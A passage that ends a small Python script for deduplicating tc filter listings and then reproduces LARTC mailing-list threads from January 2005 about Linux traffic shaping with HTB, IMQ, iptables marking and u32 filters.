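    """Collapse entries that differ only in the pref they are listed under."""
    seen = {}
    for r in rules:
        key = (r["fh"], r["flowid"], tuple(r["matches"]))
        seen.setdefault(key, []).append(r["pref"])
    return [{"fh": fh, "flowid": flowid, "matches": list(matches),
             "listed_under": prefs}
            for (fh, flowid, matches), prefs in seen.items()]


if __name__ == "__main__":
    listed = parse_filters(SAMPLE)
    print(f"{len(listed)} entries listed")
    for rule in unique_rules(listed):
        print(rule["fh"], rule["flowid"], rule["matches"],
              "listed under pref", rule["listed_under"])
```

On the sample this reports four listed entries but only two distinct rules, each shown under both pref 130 and pref 131.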
From felix@ufomechanic.net Thu Jan 27 20:03:22 2005
From: felix@ufomechanic.net (felix)
Date: Thu, 27 Jan 2005 20:03:22 +0000
Subject: [LARTC] How do I make the MARK target terminate in Iptables?
Message-ID: <41F9490A.2090202@ufomechanic.net>

Hi,

I would like setting the mark to be a terminating rule in Iptables. Is there a patch or an argument/parameter that enables this behavior? Or exactly which line do I need to modify in the source code?

I would massively prefer not to follow each mark rule with a second rule with the same matching criterion that simply terminates - that's too untidy for what I'm trying to do.

Apologies, I'm in a big hurry so need a quick but robust fix.

Many, many thanks,

-Paul

From Denis Kot Thu Jan 27 20:19:36 2005
From: Denis Kot (Denis Kot)
Date: Thu, 27 Jan 2005 20:19:36 +0000
Subject: [LARTC] negative tokens
In-Reply-To: <62916e5050127100345653a00@mail.gmail.com>
References: <3cfad9ca0501262342794e99e4@mail.gmail.com> <62916e5050127100345653a00@mail.gmail.com>
Message-ID: <3cfad9ca05012712196a08ab59@mail.gmail.com>

##########
DEV0=imq0
RATEUP=100
VPNS=30

/sbin/ip link set imq0 up

tc qdisc add dev $DEV0 root handle 1: htb default 30

tc class add dev $DEV0 parent 1: classid 1:1 htb rate ${RATEUP}kbit ceil ${RATEUP}kbit

tc class add dev $DEV0 parent 1:1 classid 1:30 htb rate $[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit
###########

this is from /etc/ppp/ip-up.local:

###########

# the followings parameters are available:
# $1 = interface-name
# $2 = tty-device
# $3 = speed
# $4 = local-IP-address
# $5 = remote-IP-address
# $6 = ipparam

/sbin/iptables -t mangle -A PREROUTING -i $1 -d ! 192.168.0.0/16 -j IMQ --todev 0
/sbin/tc class add dev $DEV0 parent 1:1 classid 1:2${1/ppp/} htb rate $[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit
/sbin/tc filter add dev $DEV0 protocol ip parent 1:0 prio 1 u32 match ip src $5 flowid 1:2${1/ppp/}
###########

On Thu, 27 Jan 2005 19:03:47 +0100, Sujith Chennupati wrote:
> it would be clear if you attach the code you are using with
> may be some packets are not matched with the filter you specified and
> going by deafult queue
>
>
> On Thu, 27 Jan 2005 09:42:29 +0200, Denis Kot wrote:
> > I have this:
> > class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst
> > 1599b cburst 1611b
> > Sent 33233 bytes 772 pkts (dropped 0, overlimits 0)
> > lended: 415 borrowed: 357 giants: 0
> > tokens: -3756376 ctokens: 128779
> >
> > or this:
> > class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst
> > 1599b cburst 1611b
> > Sent 57554 bytes 618 pkts (dropped 0, overlimits 0)
> > lended: 193 borrowed: 425 giants: 0
> > tokens: -484950 ctokens: 128779
> >
> > and there is more like this
> > what´s wrong?
> >
> > this is class for imq0 device (for me this is ingres device) and I have this:
> > imq0 Link encap:UNSPEC HWaddr
> > 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00
> > UP RUNNING NOARP MTU:1500 Metric:1
> > RX packets:131111 errors:0 dropped:0 overruns:0 frame:0
> > TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0
> > collisions:0 txqueuelen:30
> > RX bytes:17694200 (16.8 Mb) TX bytes:15230834 (14.5 Mb)
> >
> > as you can see RX bytes doesn´t equal to TX bytes. what´s wrong?
> >
> > --
> > Denis Kot
> > denis?jabber.org.by
> > ICQ: 13680126
> > Mobil: +375 29 6-1234-78
> > _______________________________________________
> > LARTC mailing list / LARTC@mailman.ds9a.nl
> > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
> >
>
> --
> sujith chandra chowdhary CHENNUPATI
>

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78

From jacob martinson Thu Jan 27 22:04:58 2005
From: jacob martinson (jacob martinson)
Date: Thu, 27 Jan 2005 16:04:58 -0600
Subject: [LARTC] question about filter priorities and "tc -d filter show" output
In-Reply-To: <5b747959050127100044c0f@mail.gmail.com>
References: <5b747959050127100044c0f@mail.gmail.com>
Message-ID: <5b74795905012714043accb546@mail.gmail.com>

forgot the [LARTC] prefix in the subject...

On Thu, 27 Jan 2005 12:00:14 -0600, jacob martinson wrote:
> The interface is setup like this:
> # tc qdisc del dev eth0 root
> # tc qdisc add dev eth0 root handle 1: htb default 2
> # tc class add dev eth0 parent 1: classid 1:2 htb rate 20mbit ceil 20mbit
>
> If I add a second class and a filter to send traffic to it like this:
> # tc class add dev eth0 parent 1: classid 1:130 htb rate 1Mbit ceil 1Mbit
> # tc filter add dev eth0 protocol ip parent 1:0 prio 130 u32 match ip dst \
> > 1.1.1.10 flowid 1:130
>
> The output of "tc -d filter show dev eth0" makes sense to me and looks
> like this:
> filter parent 1: protocol ip pref 130 u32
> filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1
> filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key
> ht 800 bkt 0 flowid 1:130
> match 0101010a/ffffffff at 16
>
> If I add a third class and a filter for it, things start looking weird to me:
>
> # tc filter add dev eth0 protocol ip parent 1:0 prio 131 u32 match ip
> dst 1.1.1.11 \
> > flowid 1:131
> # tc class add dev eth0 parent 1: classid 1:132 htb rate 1Mbit ceil 1Mbit
> # tc -d filter show dev eth0
> filter parent 1: protocol ip pref 130 u32
> filter parent 1: protocol ip pref 130 u32 fh 801: ht divisor 1
> filter parent 1: protocol ip pref 130 u32 fh 801::800 order 2048 key
> ht 801 bkt 0 flowid 1:131
> match 0101010b/ffffffff at 16
> filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1
> filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key
> ht 800 bkt 0 flowid 1:130
> match 0101010a/ffffffff at 16
> filter parent 1: protocol ip pref 131 u32
> filter parent 1: protocol ip pref 131 u32 fh 801: ht divisor 1
> filter parent 1: protocol ip pref 131 u32 fh 801::800 order 2048 key
> ht 801 bkt 0 flowid 1:131
> match 0101010b/ffffffff at 16
> filter parent 1: protocol ip pref 131 u32 fh 800: ht divisor 1
> filter parent 1: protocol ip pref 131 u32 fh 800::800 order 2048 key
> ht 800 bkt 0 flowid 1:130
> match 0101010a/ffffffff at 16
>
> If N is the number of filters I have on the root qdisc, I get
> N-squared entries from the "show filter" command.
>
> Can someone explain how this works or point me to documentation that
> explains it? My system doesn't have a "tc-filters" manpage.
>
> Thanks!
>
> -Jacob
>

From beatlelittle@yahoo.com.cn Fri Jan 28 00:55:31 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Fri, 28 Jan 2005 08:55:31 +0800 (CST)
Subject: [LARTC] negative tokens
In-Reply-To: <3cfad9ca05012712196a08ab59@mail.gmail.com>
Message-ID: <20050128005531.85363.qmail@web15504.mail.cnb.yahoo.com>

What does tokens and ctokens mean ??
thanks.

Denis Kot wrote:
##########
DEV0=imq0
RATEUP=100
VPNS=30

/sbin/ip link set imq0 up

tc qdisc add dev $DEV0 root handle 1: htb default 30

tc class add dev $DEV0 parent 1: classid 1:1 htb rate ${RATEUP}kbit ceil ${RATEUP}kbit

tc class add dev $DEV0 parent 1:1 classid 1:30 htb rate $[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit
###########

this is from /etc/ppp/ip-up.local:

###########

# the followings parameters are available:
# $1 = interface-name
# $2 = tty-device
# $3 = speed
# $4 = local-IP-address
# $5 = remote-IP-address
# $6 = ipparam

/sbin/iptables -t mangle -A PREROUTING -i $1 -d ! 192.168.0.0/16 -j IMQ --todev 0
/sbin/tc class add dev $DEV0 parent 1:1 classid 1:2${1/ppp/} htb rate $[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit
/sbin/tc filter add dev $DEV0 protocol ip parent 1:0 prio 1 u32 match ip src $5 flowid 1:2${1/ppp/}
###########

On Thu, 27 Jan 2005 19:03:47 +0100, Sujith Chennupati wrote:
> it would be clear if you attach the code you are using with
> may be some packets are not matched with the filter you specified and
> going by deafult queue
>
>
> On Thu, 27 Jan 2005 09:42:29 +0200, Denis Kot wrote:
> > I have this:
> > class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst
> > 1599b cburst 1611b
> > Sent 33233 bytes 772 pkts (dropped 0, overlimits 0)
> > lended: 415 borrowed: 357 giants: 0
> > tokens: -3756376 ctokens: 128779
> >
> > or this:
> > class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst
> > 1599b cburst 1611b
> > Sent 57554 bytes 618 pkts (dropped 0, overlimits 0)
> > lended: 193 borrowed: 425 giants: 0
> > tokens: -484950 ctokens: 128779
> >
> > and there is more like this
> > what´s wrong?
> >
> > this is class for imq0 device (for me this is ingres device) and I have this:
> > imq0 Link encap:UNSPEC HWaddr
> > 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00
> > UP RUNNING NOARP MTU:1500 Metric:1
> > RX packets:131111 errors:0 dropped:0 overruns:0 frame:0
> > TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0
> > collisions:0 txqueuelen:30
> > RX bytes:17694200 (16.8 Mb) TX bytes:15230834 (14.5 Mb)
> >
> > as you can see RX bytes doesn´t equal to TX bytes. what´s wrong?
> >
> > --
> > Denis Kot
> > denis?jabber.org.by
> > ICQ: 13680126
> > Mobil: +375 29 6-1234-78
> > _______________________________________________
> > LARTC mailing list / LARTC@mailman.ds9a.nl
> > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
> >
>
> --
> sujith chandra chowdhary CHENNUPATI
>

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78
_______________________________________________
LARTC mailing list / LARTC@mailman.ds9a.nl
http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/

From beatlelittle@yahoo.com.cn Fri Jan 28 01:44:20 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Fri, 28 Jan 2005 09:44:20 +0800 (CST)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To:
Message-ID: <20050128014421.57144.qmail@web15507.mail.cnb.yahoo.com>

Look at this case, it even does no work! (following command run on ssh server.)

tc qdisc add dev eth0 root handle 1: htb default 13
tc class add dev eth0 parent 1: classid 1:1 htb rate 500kbit ceil 500kbit
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 500kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 100kbit ceil 500kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 500kbit prio 1
tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5

iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20
iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN

tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11

I expect data from ssh server to my client 10.190.6.16 should goes into 1:11, and other data goes into default 1:13. But when I use ssh client on other machine(not 10.190.6.16), the data seems also goes into 1:11(I got this from tc -s -d class show dev eth0). Why?

"Catalin(ux aka Dino) BOIE" wrote:
On Thu, 27 Jan 2005, CcM wrote:

> Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why?
>
> tc qdisc add dev eth0 root handle 1: htb default 13
> tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1
> tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
> tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
> tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
>
> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20
> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN
>
> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21
> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN

I bet you use passive mode in ftp so you get a weird port, not ftp-data (20). ftp is tricky to match.
You can use this:
iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \
-j MARK --set-mark 21

This will mark with 21 all ftp control+data connections.

>
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12
>
>
> "Catalin(ux aka Dino) BOIE" wrote:
> On Wed, 26 Jan 2005, CcM wrote:
>
>> It does work! Thanks!
>> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle?
>>
>> "Catalin(ux aka Dino) BOIE" wrote:
>> Use:
>> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
>> --set-mark 20
>
> Because local generated packets doesn't go through PREROUTING.
> But, best is to use OUTPUT.
>
>>
>> ---
>> Catalin(ux aka Dino) BOIE
>> catab at deuroconsult.ro
>> http://kernel.umbrella.ro/
>> _______________________________________________
>> LARTC mailing list / LARTC@mailman.ds9a.nl
>> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>
> ---
> Catalin(ux aka Dino) BOIE
> catab at deuroconsult.ro
> http://kernel.umbrella.ro/

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/
Look at this case, it doesn't even work!

(The following commands were run on the ssh server.)
tc qdisc add dev eth0 root handle 1: htb default 13
tc class add dev eth0 parent 1: classid 1:1 htb rate 500kbit ceil 500kbit
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 500kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 100kbit ceil 500kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 500kbit prio 1
tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
 
iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20
iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN
 
tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11

I expect data from the ssh server to my client 10.190.6.16 to go into 1:11, and other data to go into the default 1:13. But when I use an ssh client on another machine (not 10.190.6.16), the data also seems to go into 1:11 (I got this from tc -s -d class show dev eth0). Why?

"Catalin(ux aka Dino) BOIE" <util@deuroconsult.ro> wrote:
On Thu, 27 Jan 2005, CcM wrote:

> Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why?
>
> tc qdisc add dev eth0 root handle 1: htb default 13
> tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1
> tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
> tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
> tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
>
> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20
> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN
>
> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21
> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN

I bet you use passive mode in ftp so you get a weird port, not ftp-data
(20). ftp is tricky to match. You can use this:
iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \
-j MARK --set-mark 21
This will mark with 21 all ftp control+data connections.

>
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12
>
>
> "Catalin(ux aka Dino) BOIE" wrote:
> On Wed, 26 Jan 2005, CcM wrote:
>
>> It does work! Thanks!
>> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle?
>>
>> "Catalin(ux aka Dino) BOIE" wrote:
>> Use:
>> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
>> --set-mark 20
>
> Because local generated packets doesn't go through PREROUTING.
> But, best is to use OUTPUT.
>

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/



From rio@martin.mu Fri Jan 28 13:47:35 2005
From: rio@martin.mu (Rio Martin.)
Date: Fri, 28 Jan 2005 13:47:35 +0000
Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table.
In-Reply-To: <41F8E0A1.4060108@dsl.pipex.com>
References: <200501191657.15767.rio@martin.mu> <200501261804.53584.rio@martin.mu> <41F8E0A1.4060108@dsl.pipex.com>
Message-ID: <200501281347.35551.rio@martin.mu>

On Thursday 27 January 2005 12:37, Andy Furniss wrote:
> > I'll make it simple for you as possible.
> > i have linux box which have eth0 220.1.1.1 as primary ip and aliasses:
> > eth0:1 192.168.1.1 , eth0:1 192.168.1.2
> > Both 192.168.1.1 & 192.168.1.2 NATed to 220.1.1.1
> > OKay, now my question is:
> > How do i manage and limit traffic generated from those ips (192.168.1.1 &
> > 192.168.1.2) ? Not just traffic outside, but traffic coming to those ips
> > from Internet.
> > I found it so difficult because traffic coming from internet to eth0 will
> > be using 220.1.1.1 not 192.168.x.x
>
> If you use IMQ and get it to hook after NAT in PREROUTING then forwarded
> traffic should have been denatted and have local addresses. You can use
> TC filters to classify for htb etc.
> Traffic from internet to squid will probably have 220. IP address.

That's what i'm worrying of, the ip address from internet would be 220.1.1.1,
not 192.168.x.x
IMQ with iptables marking unable to mark the packets to 192.168.x.x

> If you want to try a way without IMQ then AIUI you can patch squid so
> you can classify hit/miss traffic and then you could shape traffic as
> egress on eth0. I don't use squid - but I assume here it limits the rate
> it pulls miss pages to the rate that client requests.
> http://www.docum.org/docum.org/faq/cache/65.html

I've tried this before, but never succeed. I didn't know where should i attach
the 10:100 class. In the document, just told to add this class in tc, without
giving some information which interface should i attach this class.

Regards,
Rio Martin.

From raptor@tvskat.net Fri Jan 28 07:12:39 2005
From: raptor@tvskat.net (raptor@tvskat.net)
Date: Fri, 28 Jan 2005 09:12:39 +0200
Subject: [LARTC] iproute-save ?
Message-ID: <20050128091239.102bec97@bugs>

Anyone to know iproute-save, iproute-restore like script similar iptables-save/restore ?
that stores everything routes,rules,tables everything ...
then init.d-script that among other things stores the state on shutdown :") (that's easy then)

-----
http://linuxtoday.com/news_story.php3?ltsn=2004-12-08-004-32-OS-BZ-DT-0005
snip> MS Office is popular in the same way as heart disease is the most popular way to die.

From util@deuroconsult.ro Fri Jan 28 08:16:03 2005
From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE)
Date: Fri, 28 Jan 2005 10:16:03 +0200 (EET)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To: <20050128014421.57144.qmail@web15507.mail.cnb.yahoo.com>
References: <20050128014421.57144.qmail@web15507.mail.cnb.yahoo.com>
Message-ID:

> iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20
> iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN
>
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
>
> I expect data from ssh server to my client 10.190.6.16 should goes into
> 1:11, and other data goes into default 1:13. But when I use ssh client
> on other machine(not 10.190.6.16), the data seems also goes into 1:11(I
> got this from tc -s -d class show dev eth0). Why?

Because you didn't flush the mangle table. Your example works ok for me.
Add an iptables -t mangle -F before running the script.

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/

From raptor@tvskat.net Fri Jan 28 10:19:36 2005
From: raptor@tvskat.net (raptor@tvskat.net)
Date: Fri, 28 Jan 2005 12:19:36 +0200
Subject: [LARTC] iproute-save ?
In-Reply-To: <41F9F545.6040409@cardvn.net>
References: <20050128091239.102bec97@bugs> <41F9F545.6040409@cardvn.net>
Message-ID: <20050128121936.394616d9@bugs>

that is the hard part to make it not mess with normal if-up/down scripts and routes they add...
I have a lot of manual routes and rules which are not easy handled especially when I add another boxes which also happen to have different routes.....
If I can figure out the format of the default-ip-up/down routes I can skip them with a regex.. will have to look..

|I think it doesn't sound elegant, routing system strictly depends on
|availability interfaces, so setting up routes should be done in if-up
|and if-down script, for example, if you unplug a NIC before booting the
|computer, do you want the route for that NIC to be set up? And sometimes
|you may need to bring down a NIC - then the kernel will delete your
|routes automatically, if you have a nice if-up script, the routes will
|be recovered when you bring it up. An init.d script can't do it.
|If you still want a init.d script, go ahead and write your own script,
|it's rather easy to do save states and restore on boot, but I guess you
|may want things to done right instead of a messy solution.
|
|raptor@tvskat.net wrote:
|
|>Anyone to know iproute-save, iproute-restore like script similar iptables-save/restore ?
|>that stores everytihng routes,rules,tables everything ...
|>then init.d-script that among other things stores the state on shutdown :") (thats easy then)
|>
|>
|

From paras@bajranet.com.np Fri Jan 28 11:48:57 2005
From: paras@bajranet.com.np (Paras pradhan)
Date: Fri, 28 Jan 2005 17:33:57 +0545 (NPT)
Subject: [LARTC] Linux Bridge + QoS Shaper HOWTO available
In-Reply-To:
References:
Message-ID: <57084.202.174.152.73.1106912937.squirrel@mail.imax.com.np>

hello:

nice article...
Does any one has same kind of article covering IMQ?

Thanks
Paras.

> I've created a pretty complete HOWTO on creating a Linux Bridge (using
> Fedora) to shape LAN <--> WAN traffic. It includes installation
> instructions, a script to configure the bridge (which you install as a
> service), and 2 scripts to configure the network interfaces using
> traffic control.
>
> http://www.burnpc.com/website.nsf/all/3a64a6369757819686256f960068ad75!OpenDocument
>
>
>
> If anyone has any questions or feedback I'm very interested. This
> configuration has evolved over the past 6 months and is somewhat
> tweaked. The highest priority traffic in my config, is of course, IAX2
> (Asterisk VoIP protocol).
>
> Regards,
>
> Ron

Paras pradhan
Systems Dept.
Bajranet PVT LTD
Kathmandu
Nepal.

From david.hajek@systinet.com Fri Jan 28 13:26:22 2005
From: david.hajek@systinet.com (David Hajek)
Date: Fri, 28 Jan 2005 14:26:22 +0100
Subject: [LARTC] IMQ with IPSec
Message-ID: <20050128132631.97DDF4007@outpost.ds9a.nl>

Hi,

I would like to shape incoming traffic on eth0 and ipsec0
(binded to eth0). I need to set minimal bandwidth to some
packets going via ipsec0 interface.

It is running fine when I simply mark the ESP (protocol 50)
packets in the PREROUTING chain - means all ipsec packets
are shaped. Like:

iptables -t mangle -A PREROUTING -i eth0 -p 50 -j MARK --set-mark 30
iptables -t mangle -A PREROUTING -i eth0 -p 50 -j RETURN

The issue I'm dealing with is how can I mark packets based on
internal destination/source IP in PREROUTING chain when it is
encrypted ipsec packet. I can see the ipsec packet decrypted in
FORWARD chain, but will that work correctly with IMQ, when I mark
it here?

Thanks,
David

From alaios@yahoo.com Fri Jan 28 16:44:19 2005
From: alaios@yahoo.com (Alaios)
Date: Fri, 28 Jan 2005 08:44:19 -0800 (PST)
Subject: [LARTC] tc filter change/replace
Message-ID: <20050128164419.40811.qmail@web54710.mail.yahoo.com>

Tomas Graf:
You mentioned that
"All classifier except rsvp are changeable in the latest bk. The patchset has gone in around rc1-bk3-5"

Well issue 1 is that in iproute-latest (as well as the one released yesterday) the output of:
tc show filter dev eth0 parent ffff:" and change/replace DO NOT WORK.
-----------------------------------------------------------------------
filter protocol ip pref 50 u32 fh 800::801 order 2049 ht 800 bkt 0
  match 0a010102/ffffffff at 12
 police 0x4 rate 20000bit burst 2559b mtu 2kb action reclassify
ref -10352222812 bind -8666697856

on the bk version (latest changeLog entry 18-1-2005) as you suggested the output is NOT VERBOSE ENOUGH to see if all parameters are working, but change/replace SEEM TO BE WORKING.
Here's the output:
filter protocol ip pref 50 u32 fh 800::801 order 2049 ht 800 bkt 0
  match 0a010102/ffffffff at 12

ISSUE 2
-------
In lots of computers i try to install iproute2 i get an error about db_185.h missing . Issuing a simple
apt-get install libdb4.1-dev
resolves the problem and the arpd compiles perfectly. Maybe consider documenting that somewhere.

From andy.furniss@dsl.pipex.com Sat Jan 29 00:55:39 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sat, 29 Jan 2005 00:55:39 +0000
Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table.
In-Reply-To: <200501281347.35551.rio@martin.mu>
References: <200501191657.15767.rio@martin.mu> <200501261804.53584.rio@martin.mu> <41F8E0A1.4060108@dsl.pipex.com> <200501281347.35551.rio@martin.mu>
Message-ID: <41FADF0B.4030508@dsl.pipex.com>

Rio Martin. wrote:
> On Thursday 27 January 2005 12:37, Andy Furniss wrote:
>
>>>I'll make it simple for you as possible.
>>>i have linux box which have eth0 220.1.1.1 as primary ip and aliasses:
>>>eth0:1 192.168.1.1 , eth0:1 192.168.1.2
>>>Both 192.168.1.1 & 192.168.1.2 NATed to 220.1.1.1
>>>OKay, now my question is:
>>>How do i manage and limit traffic generated from those ips (192.168.1.1 &
>>>192.168.1.2) ? Not just traffic outside, but traffic coming to those ips
>>>from Internet.
>>>I found it so difficult because traffic coming from internet to eth0 will
>>>be using 220.1.1.1 not 192.168.x.x
>>
>>If you use IMQ and get it to hook after NAT in PREROUTING then forwarded
>>traffic should have been denatted and have local addresses. You can use
>>TC filters to classify for htb etc.
>>Traffic from internet to squid will probably have 220. IP address.
>
>
> Thats what i'm worrying of, the ip address from internet would be 220.1.1.1,
> not 192.168.x.x
> IMQ with iptables marking unable to mark the packets to 192.168.x.x

Iptables can't mark traffic from inet to lan, but imq hooked after nat
in prerouting will see local addresses for inet to lan traffic and
220.1.1.1 for traffic from inet to squid. You use tc filters and u32 to
match them eg.

$TC filter add dev $DWIF protocol ip parent 1:2 prio 1 u32 \
match ip dst 192.168.0.2 flowid 1:32

>
>
>>If you want to try a way without IMQ then AIUI you can patch squid so
>>you can classify hit/miss traffic and then you could shape traffic as
>>egress on eth0. I don't use squid - but I assume here it limits the rate
>>it pulls miss pages to the rate that client requests.
>>http://www.docum.org/docum.org/faq/cache/65.html
>
>
> I ve tried this before, but never succeed. I didnt know where should i attach
> the 10:100 class. In the document, just told to add this class in tc, without
> giving some information which interface should i attach this class.

I've not used squid, but think the idea is to shape on eth0 traffic from
inet to lan and miss traffic from squid to lan. The patch lets you
classify miss traffic from squid which you make an htb class for and you
can then involve it in sharing/prioritising etc with other inet to lan
traffic.

Andy.

>
> Regards,
> Rio Martin.
>

From rio@martin.mu Sat Jan 29 18:29:44 2005
From: rio@martin.mu (Rio Martin.)
Date: Sat, 29 Jan 2005 18:29:44 +0000
Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table.
In-Reply-To: <41FADF0B.4030508@dsl.pipex.com>
References: <200501191657.15767.rio@martin.mu> <200501281347.35551.rio@martin.mu> <41FADF0B.4030508@dsl.pipex.com>
Message-ID: <200501291829.44294.rio@martin.mu>

On Saturday 29 January 2005 00:55, Andy Furniss wrote:
> > I ve tried this before, but never succeed. I didnt know where should i
> > attach the 10:100 class. In the document, just told to add this class in
> > tc, without giving some information which interface should i attach this
> > class.
> I've not used squid, but think the idea is to shape on eth0 traffic from
> inet to lan and miss traffic from squid to lan. The patch lets you
> classify miss traffic from squid which you make an htb class for and you
> can then involve it in sharing/priorotising etc with other inet to lan
> traffic.
> Andy.

Thanks Andy for the info u gave,
But the patch is totally missed with Squid-2.5.STABLE7, so i have to do it manually.
I tried to place this 10:100 class into eth0 (inet interface) and successfully do some shaping on outgoing request from squid to origin server where client request.
It won't shape the incoming from origin server to squid.
As u see, this is tcp_outgoing_priority, not tcp_incoming_priority.. :))
so i still have to figure out more how to shape incoming packets to this squid proxy.

- Rio.Martin -

From beatlelittle@yahoo.com.cn Sun Jan 30 07:26:22 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Sun, 30 Jan 2005 15:26:22 +0800 (CST)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To:
Message-ID: <20050130072623.67498.qmail@web15506.mail.cnb.yahoo.com>

You're right. Thank you very much!

"Catalin(ux aka Dino) BOIE" <util@deuroconsult.ro> wrote:
> iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20
> iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN
>
